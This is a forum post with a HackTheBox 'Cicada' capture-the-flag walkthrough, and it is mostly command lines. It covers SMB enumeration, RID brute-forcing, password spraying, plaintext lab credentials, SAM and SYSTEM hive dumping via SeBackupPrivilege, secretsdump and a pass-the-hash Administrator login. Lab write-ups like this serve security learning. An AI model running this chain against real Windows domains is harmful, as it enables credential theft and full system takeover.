Hackthebox - Cicada

HackTheBox
1

HTB Cicada Writeup - Steps and Commands

1. Recon: Nmap Scan

Scan the target machine to identify open ports and services:


nmap -sC -sV -oN nmap_scan.txt cicada.htb
  • Key ports: Kerberos (88), LDAP (389, 636), SMB (445), HTTP (5985)

2. SMB Enumeration

Check for open SMB shares:


smbclient -L //cicada.htb -N
  • Result: Access the HR share and retrieve a file with a default password.

3. RID Brute-Forcing for Usernames

Use netexec to brute-force RIDs and enumerate valid usernames:


netexec smb cicada.htb -u '' -p '' --rid-brute

Extract usernames from the output:


grep -oP '(?<=CICADA\\)[^ ]+' output.txt > usernames.txt

4. Password Spray for User Login

Perform password spraying against the enumerated usernames:


netexec smb cicada.htb -u usernames.txt -p Cicada$M6Corpb*@Lp#nZp!8 --continue-on-success
  • Result: Credentials for michael.wrightson.

5. LDAP Enumeration

Use the credentials to enumerate users via LDAP:


netexec ldap cicada.htb -u michael.wrightson -p Cicada$M6Corpb*@Lp#nZp!8 --users
  • Result: Credentials for david.orelious.

6. Accessing SMB DEV Share

Access the DEV share using david.orelious’s credentials and download the Backup_script.ps1 file:


smbclient //cicada.htb/DEV -U david.orelious
  • Result: Credentials for emily.oscars.

7. WinRM Access

Log in using evil-winrm with emily.oscars’s credentials:


evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b7tVt'

8. Privilege Escalation with SeBackupPrivilege

Use whoami /all to confirm Emily’s privileges. Since Emily has the SeBackupPrivilege, dump the SAM and SYSTEM registry hives for privilege escalation:


reg save hklm\sam c:\Temp\sam

reg save hklm\system c:\Temp\system

9. Extract Secrets from the Registry Hives

Download the hives and use Impacket’s secretsdump to extract hashes:


impacket-secretsdump -sam sam -system system -security security local

10. Administrator Access

Use the extracted hash to log in as Administrator:


evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

Summary

  • Enumerate SMB shares, brute-force RIDs, and perform password spraying

  • Use LDAP and SMB enumeration to gather credentials

  • Exploit SeBackupPrivilege to dump registry hives

  • Extract secrets with secretsdump and log in as Administrator

1 Like